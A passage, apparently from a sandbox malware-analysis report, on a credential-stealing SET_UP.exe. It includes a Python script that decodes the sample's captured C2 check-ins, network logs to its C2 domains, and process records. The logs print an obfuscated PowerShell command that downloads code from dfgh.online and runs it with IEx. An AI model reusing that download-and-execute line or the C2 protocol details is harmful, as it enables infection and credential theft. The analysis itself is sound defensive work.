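SESSION4_BOUNDARY = "1BP8P7DHDMKP0OSWR"  # from the request's Content-Type header
SESSION4_BODY_HEX = """
2d 2d 31 42 50 38 50 37 44 48 44 4d 4b 50 30 4f 53 57 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a
38 43 42 32 45 31 34 37 35 41 38 30 35 35 38 44 34 46 35 36 46 35 39 35 38 36 41 42 46 33 30 38 0d 0a
2d 2d 31 42 50 38 50 37 44 48 44 4d 4b 50 30 4f 53 57 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a
33 0d 0a
2d 2d 31 42 50 38 50 37 44 48 44 4d 4b 50 30 4f 53 57 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a
68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 0d 0a
"""
# Session 7 request body (application/x-www-form-urlencoded, 115 bytes).
SESSION7_BODY_HEX = """
61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64 26 68 77 69 64 3d 38 43 42 32 45 31 34 37 35 41 38 30 35 35 38 44 34 46 35 36 46 35 39 35 38 36 41 42 46 33 30 38
"""
# The two chunks every session received back (20 + 5 bytes).
REPLY_CHUNKS_HEX = (
    "66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a",
    "30 0d 0a 0d 0a",
)


def parse_multipart(body: bytes, boundary: str) -> dict[str, bytes]:
    """Map field name -> raw value; tolerates a body truncated by the capture."""
    delim = b"--" + boundary.encode("ascii")
    fields: dict[str, bytes] = {}
    for part in body.split(delim)[1:]:  # bytes before the first delimiter are preamble
        if part.startswith(b"--"):  # "--boundary--" closes the body
            break
        if part.startswith(b"\r\n"):
            part = part[2:]
        head, sep, value = part.partition(b"\r\n\r\n")
        if not sep:  # part cut off inside its headers (e.g. "Content-Disposi")
            continue
        if value.endswith(b"\r\n"):  # CRLF that precedes the next delimiter
            value = value[:-2]
        match = re.search(rb'name="([^"]*)"', head)
        if match:
            fields[match.group(1).decode("ascii")] = value
    return fields


def parse_chunked(stream: bytes) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body; raises on a truncated one."""
    out, pos = bytearray(), 0
    while True:
        eol = stream.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("truncated: chunk-size line incomplete")
        size = int(stream[pos:eol].split(b";", 1)[0], 16)  # drop chunk extensions
        pos = eol + 2
        if size == 0:
            return bytes(out)  # last-chunk; trailers are ignored
        if stream[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("truncated or badly framed chunk")
        out += stream[pos:pos + size]
        pos += size + 2


def decode_multipart_checkin() -> dict[str, str]:
    """Fields of the session 4 beacon: hwid, pid, lid."""
    fields = parse_multipart(bytes.fromhex(SESSION4_BODY_HEX), SESSION4_BOUNDARY)
    return {k: v.decode("ascii", "replace") for k, v in fields.items()}


def decode_get_message() -> dict[str, str]:
    """Fields of the session 7 act=get_message request."""
    return dict(parse_qsl(bytes.fromhex(SESSION7_BODY_HEX).decode("ascii")))


def decode_reply() -> str:
    """Payload of the chunked reply: the only content behind the 200 OK."""
    return parse_chunked(b"".join(bytes.fromhex(h) for h in REPLY_CHUNKS_HEX)).decode("ascii")


def correlation_keys() -> tuple[str, str]:
    """(hwid, lid) shared by both request styles: the values to pivot on."""
    a, b = decode_multipart_checkin(), decode_get_message()
    if (a["hwid"], a["lid"]) != (b["hwid"], b["lid"]):
        raise ValueError("sessions do not share hwid/lid")
    return a["hwid"], a["lid"]


if __name__ == "__main__":
    print(decode_multipart_checkin())
    print(decode_get_message())
    print(repr(decode_reply()))  # 'ok 8.46.123.189'
    print(correlation_keys())
```

The boundary changes on every request (1BP8P7DHDMKP0OSWR, 9JWW0VJD, VW51LKHI38YBQKGO44) and so does the PHPSESSID the server hands back, so neither is a useful indicator; the hwid and lid values, which stay constant across the multipart and the urlencoded requests, are what correlation_keys() returns and what a hunt across hosts or across the remaining sessions of this report should key on.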


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49757 | 188.114.97.3 | 443 | 7268 | C:\Users\user\Desktop\SET_UP.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-07 13:48:35 UTC | 265 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 115
Host: skinfuzzerz.cyou
2025-01-07 13:48:35 UTC | 115 | OUT | Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 45 4c 56 49 52 41 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64 26 68 77 69 64 3d 38 43 42 32 45 31 34 37 35 41 38 30 35 35 38 44 34 46 35 36 46 35 39 35 38 36 41 42 46 33 30 38
Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--ELVIRA&j=efdebde057a1df3f7c15b7f4da907c2d&hwid=8CB2E1475A80558D4F56F59586ABF308
2025-01-07 13:48:35 UTC | 1126 | IN | HTTP/1.1 200 OK
Date: Tue, 07 Jan 2025 13:48:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=irca5sf98ucqtmmicu60ihknrs; expires=Sat, 03 May 2025 07:35:14 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FPo%2BhkD1ui4KxC7cn7SqHE5CKTnel%2F%2BgQPCxuXXLMBqOHZ0pSUcGv6JM8omzRu1R3bBjj67Qz9wcV4kQqqwWpVf2U1yFVZk3tKRxGLgNDBfstwba0rrcptW9MIrIu0J%2B38oG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8fe467ff7a2a1795-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1514&min_rtt=1514&rtt_var=569&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1016&delivery_rate=1922317&cwnd=172&unsent_bytes=0&cid=699cf2a3d2488337&ts=495&x=0"
                                                                                                                                                            2025-01-07 13:48:35 UTC | 218 bytes | IN | Data Ascii: d4Xs/thpr/rIUq9vKP4p2Ijc1nNiSyVSGS7b5enFI2K4IFtM/zuMWO7V6CgvzYwafR4gRTQ8d7UvqCzgKzagMctmz537KuyfCqWp7c+5rpqqHvAUIGiGcNsIicZK0vGlCgK+3XpPKL2PVZzK6gvrLj4aQXQFHfPFLnhJAt9D1Gd603oZnZ+ZPc2lmek6GW5fyv4UVQUJBvEb7P23ymYkt2
                                                                                                                                                            2025-01-07 13:48:35 UTC | 5 bytes | IN | Data Ascii: 0


                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                            8 | 192.168.2.4 | 49758 | 185.161.251.214 | 443 | 7268 | C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                            2025-01-07 13:48:36 UTC | 201 bytes | OUT | GET /8574262446/ph.txt HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                            Host: cegu.shop
                                                                                                                                                            2025-01-07 13:48:36 UTC | 249 bytes | IN | HTTP/1.1 200 OK
                                                                                                                                                            Server: nginx/1.26.2
                                                                                                                                                            Date: Tue, 07 Jan 2025 13:48:36 GMT
                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                            Content-Length: 329
                                                                                                                                                            Last-Modified: Thu, 26 Dec 2024 00:07:06 GMT
                                                                                                                                                            Connection: close
                                                                                                                                                            ETag: "676c9e2a-149"
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            2025-01-07 13:48:36 UTC | 329 bytes | IN | Data Ascii: [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.


                                                                                                                                                            Target ID:0
                                                                                                                                                            Start time:08:48:05
                                                                                                                                                            Start date:07/01/2025
                                                                                                                                                            Path:C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Users\user\Desktop\SET_UP.exe"
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            File size:75'071'589 bytes
                                                                                                                                                            MD5 hash:0F91B9310E783C23ADA7D4C31C89BE4B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2036438371.0000000002970000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1988338849.000000000094D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1946741383.0000000000908000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:4
                                                                                                                                                            Start time:08:48:35
                                                                                                                                                            Start date:07/01/2025
                                                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
                                                                                                                                                            Imagebase:0xca0000
                                                                                                                                                            File size:433'152 bytes
                                                                                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:5
                                                                                                                                                            Start time:08:48:35
                                                                                                                                                            Start date:07/01/2025
                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:high
                                                                                                                                                            Has exited:true

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2056550044.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 1b81e51218b594ff39513ed23d06e850e88ef9771320e53d69876bf230e94086
                                                                                                                                                              • Instruction ID: 13a662655aff571eefb5293be808a97c76818188f7c5e492f5e8fb84d959d8da
                                                                                                                                                              • Opcode Fuzzy Hash: 1b81e51218b594ff39513ed23d06e850e88ef9771320e53d69876bf230e94086
                                                                                                                                                              • Instruction Fuzzy Hash: C74137B4A005059FCB19CF98C5949AEFBB1FF88314B118669DA05AB364C736FD50CFA0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2056550044.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: d0bdc998005df21d036c948c1d5f327227d3006e79cf2e99c06656e68f3b1c01
                                                                                                                                                              • Instruction ID: 83bdd56133b9741f5dcc42d3c3bf7f0b641cab8513193d7e811c86e0a4a86ec9
                                                                                                                                                              • Opcode Fuzzy Hash: d0bdc998005df21d036c948c1d5f327227d3006e79cf2e99c06656e68f3b1c01
                                                                                                                                                              • Instruction Fuzzy Hash: 6421E7B4A006159FCB04CF59C9849AAFBF1FF4C310B1585A9E909EB365C731EC41CBA0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2056550044.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 19cdf9e8bb5ba99f33dd53252c2cf2cb88e3f6d8d6916e43cf4177994ebef88d
                                                                                                                                                              • Instruction ID: 2e1095a611c48add03a2c0ff83f9eb80aeef8d7c08ba49bf55cc9ccb9b09e4e2
                                                                                                                                                              • Opcode Fuzzy Hash: 19cdf9e8bb5ba99f33dd53252c2cf2cb88e3f6d8d6916e43cf4177994ebef88d
                                                                                                                                                              • Instruction Fuzzy Hash: F5215C74A052599FCB00CF9CD880DAEFBB0FF89310B148599E949AB352C331ED41CBA1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2053595200.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_301d000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: e5e7ad35c42ef0743bff086bc9c8ece9371fd8d6cad699dd92a439846bf01a85
                                                                                                                                                              • Instruction ID: 3230af72e17fb1a26e5bc5fc49ab34c0dc465ba114a507f76f7b31e67c30b37f
                                                                                                                                                              • Opcode Fuzzy Hash: e5e7ad35c42ef0743bff086bc9c8ece9371fd8d6cad699dd92a439846bf01a85
                                                                                                                                                              • Instruction Fuzzy Hash: 2401847140A3409AE7518A2AC98477BBFD8EF41364F1CC56AED484A146C679D851C6B1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2053595200.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_301d000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 5f619d0a21a1768d320918c8bf90d0361ff71479b2282e9bd1328fba82aed4b3
                                                                                                                                                              • Instruction ID: a6571f23daf66e986264928e92d4d10b876d4d36cad34eec620be23d7ed3caf3
                                                                                                                                                              • Opcode Fuzzy Hash: 5f619d0a21a1768d320918c8bf90d0361ff71479b2282e9bd1328fba82aed4b3
                                                                                                                                                              • Instruction Fuzzy Hash: D201407240E3C09ED7128B25CC94B62BFB8EF43224F1D80CBD9888F1A7C2699845C772
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2056550044.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: m^$m^$m^$m^$m^$m^$m^$m^$m^
                                                                                                                                                              • API String ID: 0-3443393009
                                                                                                                                                              • Opcode ID: 8daae4c7e52474d955427e617f867401baaba4f8ee7a5c1f93a84eb83a1dc8d0
                                                                                                                                                              • Instruction ID: ccad492d2ce659d0e1d62e40168785c15fe8e337eb73e1687d6d8919058f63c2
                                                                                                                                                              • Opcode Fuzzy Hash: 8daae4c7e52474d955427e617f867401baaba4f8ee7a5c1f93a84eb83a1dc8d0
                                                                                                                                                              • Instruction Fuzzy Hash: 5931716290D7C64FD7035B289DA51C17F70AF23295F4E04D3CCE08F1A7EA585A2E8766
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2056550044.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: m^$m^$m^$m^$m^$m^$m^$m^
                                                                                                                                                              • API String ID: 0-4041699907
                                                                                                                                                              • Opcode ID: a932ee5b5cda6d877962d155998b7b15772a1cfa55cfc009c448af8cd6049543
                                                                                                                                                              • Instruction ID: 351dc5b588a31e65c775d6ead505fc2c9eec686a3061ae07f99ee0766daa3e97
                                                                                                                                                              • Opcode Fuzzy Hash: a932ee5b5cda6d877962d155998b7b15772a1cfa55cfc009c448af8cd6049543
                                                                                                                                                              • Instruction Fuzzy Hash: C321803190E7D44FD7135B289DB82817F70AF03295B4E00D3CDE08F0A7E968592987A6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2056550044.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: m^$m^$m^$m^$m^$m^
                                                                                                                                                              • API String ID: 0-4289189412
                                                                                                                                                              • Opcode ID: e94dfc2ef5a8e731f6ba8d4672ed1112d928ee5dbb088b4f48acea8fcfedbc07
                                                                                                                                                              • Instruction ID: dbef60a64370296d317cfbd2c0064c180514f6deaa3a05f93f186f777dc69715
                                                                                                                                                              • Opcode Fuzzy Hash: e94dfc2ef5a8e731f6ba8d4672ed1112d928ee5dbb088b4f48acea8fcfedbc07
                                                                                                                                                              • Instruction Fuzzy Hash: C821AF2194E7D10FD7035B28ADA50D57F309F532A0B4E04E7CDD0CF9A7E9084A4E87A6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2056550044.0000000004EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EF0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_4ef0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: m^$m^$m^$m^$m^
                                                                                                                                                              • API String ID: 0-1825230704
                                                                                                                                                              • Opcode ID: 0080a255e04ba04921ab7f04b29466ec6fc4cecf5b2dde55e268fb22df98de4f
                                                                                                                                                              • Instruction ID: 3890a17f1544e5cc62bc49a11194609c2c6704e4bf9277f2b6c37f952b2d800a
                                                                                                                                                              • Opcode Fuzzy Hash: 0080a255e04ba04921ab7f04b29466ec6fc4cecf5b2dde55e268fb22df98de4f
                                                                                                                                                              • Instruction Fuzzy Hash: AE31BD2284E7E05FD727AB789DB01963FB08E1326470A00E3C8D0CF1B7E558599EC7A6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2065015832.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7a30000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 4'^q$4'^q$tP^q$tP^q
                                                                                                                                                              • API String ID: 0-3859475322
                                                                                                                                                              • Opcode ID: aa2720c29eac6f399004711e98720d082a222772c8541ed4d40477f1a2c963aa
                                                                                                                                                              • Instruction ID: 61054cc268e697a239c34633db79b302ea52ad5de260dfe9642ad49bb8a45a3b
                                                                                                                                                              • Opcode Fuzzy Hash: aa2720c29eac6f399004711e98720d082a222772c8541ed4d40477f1a2c963aa
                                                                                                                                                              • Instruction Fuzzy Hash: 9BB148B170C2458FCB149F69981566ABFE2AFC6220F1484BBE526CF351DE32DC46C7A1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2065015832.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7a30000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                              • API String ID: 0-2125118731
                                                                                                                                                              • Opcode ID: 673e56a56cce6dd1ed3eae053a6c7a76d9108424bcb80ad53dae222377b2e693
                                                                                                                                                              • Instruction ID: a414acdf29063e6204ed8b491cf7503946a6cd5dac51132d79652fe79b67d533
                                                                                                                                                              • Opcode Fuzzy Hash: 673e56a56cce6dd1ed3eae053a6c7a76d9108424bcb80ad53dae222377b2e693
                                                                                                                                                              • Instruction Fuzzy Hash: 222124B17083069FDF385E6A9805B37AEEA9BC0714F24842BF51ACF385DD76D8448361
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.2065015832.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7a30000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                              • API String ID: 0-2049395529
                                                                                                                                                              • Opcode ID: d34df8468e9e7631d1ef7b1d9eb14a840ca8890981cd9f033157a61422bea3ad
                                                                                                                                                              • Instruction ID: 7a5cfc342ed67f435f4be7d14adac52a53d656ab988d46b0ec37a9101140afac
                                                                                                                                                              • Opcode Fuzzy Hash: d34df8468e9e7631d1ef7b1d9eb14a840ca8890981cd9f033157a61422bea3ad
                                                                                                                                                              • Instruction Fuzzy Hash: 7D01D4A0B093894FC72A4F3818246566FB35FD3510B1944EBE091CF396CD298C498392